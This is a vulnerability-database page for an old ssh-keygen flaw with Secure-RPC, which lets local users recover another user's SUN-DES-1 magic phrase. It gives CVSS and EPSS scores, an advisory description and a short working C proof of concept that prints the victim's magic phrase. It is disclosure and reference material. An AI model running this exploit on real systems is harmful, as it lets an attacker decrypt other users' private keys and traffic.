CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
ssh-keygen in ssh 1.2.27 - 1.2.30 with Secure-RPC can allow local attackers to recover a SUN-DES-1 magic phrase generated by another user, which the attacker can use to decrypt that user's private key file.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
3.6
AV:L/AC:L/Au:N/C:P/I:P/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
1.76%
–
–
2022-03-27
–
–
1.76%
–
–
2022-04-03
–
–
1.76%
–
–
2022-04-17
–
–
1.76%
–
–
2022-08-28
–
–
1.76%
–
–
2023-03-05
–
–
1.76%
–
–
2023-03-12
–
–
–
0.05%
–
2023-03-19
–
–
–
0.05%
–
2023-04-09
–
–
–
0.05%
–
2024-01-07
–
–
–
0.05%
–
2024-03-03
–
–
–
0.05%
–
2024-03-31
–
–
–
0.05%
–
2024-06-02
–
–
–
0.05%
–
2024-06-09
–
–
–
0.05%
–
2024-08-25
–
–
–
0.05%
–
2024-12-08
–
–
–
0.05%
–
2025-03-02
–
–
–
0.05%
–
2025-01-19
–
–
–
0.05%
–
2025-03-09
–
–
–
0.05%
–
2025-03-18
–
–
–
–
0.24%
2025-04-15
–
–
–
–
0.24%
2025-04-25
–
–
–
–
0.24%
2025-04-26
–
–
–
–
0.24%
2025-04-26
–
–
–
–
0.24,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2001-01-15 23h00 +00:00 Author : Richard Silverman EDB Verified : Yes
// source: https://www.securityfocus.com/bid/2222/info
SSH is a package designed to encrypt traffic between two end points using the IETF specified SSH protocol. The SSH1 package is distributed and maintained by SSH Communications Security.
A problem exists which could allow the discovery of the secret key used to encrypt traffic on the local host. When using SUN-DES-1 to share keys with other hosts on the network to facilitate secure communication via protocols such as NFS and NIS+, the keys are shared between hosts using the private key of the user and a cryptographic algorithm to secure the contents of the key, which is stored on the NIS+ primary. The problem occurs when the key is encrypted with the SUN-DES-1 magic phrase prior to having done a keylogin (the keyserv does not have the users DH private key). A design flaw in the software that shares the key with the NIS+ master will inconsistently return the correct value for an attempted keyshare that has failed. A step in the private key encryption process is skipped, and the users private key is then encrypted only with the public key of the target server and the SUN-DES-1 magic phrase, a phrase that is guessable due to the way it is generated. A user from the same host can then execute a function that returns another users magic phrase, and use this to decrypt the private key of the victim. This makes it possible for a user with malicious intent to gain knowledge of a users secret key, and decrypt sensitive traffic between two hosts, with the possibility of gaining access and elevated privileges on the hosts and/or NIS+ domain. This reportedly affects the SSH2 series of the software package.
#include <stdio.h>
#include <rpc/rpc.h>
void die (char *msg)
{
fprintf(stderr,"%s\n",msg);
exit(1);
}
main (int argc, char **argv)
{
char buf[MAXNETNAMELEN + 1];
des_block block;
uid_t uid;
char *netname;
if (argc < 3)
die("supply uid and netname");
sscanf(argv[1], "%d", &uid);
netname = argv[2];
memset(buf, 0, sizeof(buf));
snprintf(buf, sizeof(buf), "ssh.%04X", uid);
memcpy(block.c, buf, sizeof(block.c));
if (key_encryptsession(netname, &block) != 0)
die("key_encryptsession failed");
printf("SUN-DES-1 magic phrase (uid %d, netname %s):\n %08X%08X\n",
uid,
netname,
ntohl(block.key.high),
ntohl(block.key.low));
}